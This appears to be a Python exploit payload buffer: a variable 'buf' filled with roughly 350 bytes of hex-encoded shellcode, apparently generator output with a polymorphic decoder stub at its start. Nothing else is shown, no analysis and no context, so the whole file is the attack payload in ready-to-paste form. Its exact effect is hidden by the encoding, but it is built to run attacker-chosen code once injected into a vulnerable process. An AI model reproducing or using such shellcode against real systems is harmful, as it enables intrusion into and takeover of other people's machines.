buf =  b""
buf += b"\xda\xda\xbe\x40\xba\xdb\x39\xd9\x74\x24\xf4\x5f"
buf += b"\x2b\xc9\xb1\x52\x31\x77\x17\x03\x77\x17\x83\xaf"
buf += b"\x46\x39\xcc\xd3\x5f\x3c\x2f\x2b\xa0\x21\xb9\xce"
buf += b"\x91\x61\xdd\x9b\x82\x51\x95\xc9\x2e\x19\xfb\xf9"
buf += b"\xa5\x6f\xd4\x0e\x0d\xc5\x02\x21\x8e\x76\x76\x20"
buf += b"\x0c\x85\xab\x82\x2d\x46\xbe\xc3\x6a\xbb\x33\x91"
buf += b"\x23\xb7\xe6\x05\x47\x8d\x3a\xae\x1b\x03\x3b\x53"
buf += b"\xeb\x22\x6a\xc2\x67\x7d\xac\xe5\xa4\xf5\xe5\xfd"
buf += b"\xa9\x30\xbf\x76\x19\xce\x3e\x5e\x53\x2f\xec\x9f"
buf += b"\x5b\xc2\xec\xd8\x5c\x3d\x9b\x10\x9f\xc0\x9c\xe7"
buf += b"\xdd\x1e\x28\xf3\x46\xd4\x8a\xdf\x77\x39\x4c\x94"
buf += b"\x74\xf6\x1a\xf2\x98\x09\xce\x89\xa5\x82\xf1\x5d"
buf += b"\x2c\xd0\xd5\x79\x74\x82\x74\xd8\xd0\x65\x88\x3a"
buf += b"\xbb\xda\x2c\x31\x56\x0e\x5d\x18\x3f\xe3\x6c\xa2"
buf += b"\xbf\x6b\xe6\xd1\x8d\x34\x5c\x7d\xbe\xbd\x7a\x7a"
buf += b"\xc1\x97\x3b\x14\x3c\x18\x3c\x3d\xfb\x4c\x6c\x55"
buf += b"\x2a\xed\xe7\xa5\xd3\x38\xa7\xf5\x7b\x93\x08\xa5"
buf += b"\x3b\x43\xe1\xaf\xb3\xbc\x11\xd0\x19\xd5\xb8\x2b"
buf += b"\xca\x76\xee\x0a\x6e\xef\x0d\x6c\x7f\x88\x98\x8a"
buf += b"\x15\x46\xcd\x05\x82\xff\x54\xdd\x33\xff\x42\x98"
buf += b"\x74\x8b\x60\x5d\x3a\x7c\x0c\x4d\xab\x8c\x5b\x2f"
buf += b"\x7a\x92\x71\x47\xe0\x01\x1e\x97\x6f\x3a\x89\xc0"
buf += b"\x38\x8c\xc0\x84\xd4\xb7\x7a\xba\x24\x21\x44\x7e"
buf += b"\xf3\x92\x4b\x7f\x76\xae\x6f\x6f\x4e\x2f\x34\xdb"
buf += b"\x1e\x66\xe2\xb5\xd8\xd0\x44\x6f\xb3\x8f\x0e\xe7"
buf += b"\x42\xfc\x90\x71\x4b\x29\x67\x9d\xfa\x84\x3e\xa2"
buf += b"\x33\x41\xb7\xdb\x29\xf1\x38\x36\xea\x01\x73\x1a"
buf += b"\x5b\x8a\xda\xcf\xd9\xd7\xdc\x3a\x1d\xee\x5e\xce"
buf += b"\xde\x15\x7e\xbb\xdb\x52\x38\x50\x96\xcb\xad\x56"
buf += b"\x05\xeb\xe7"
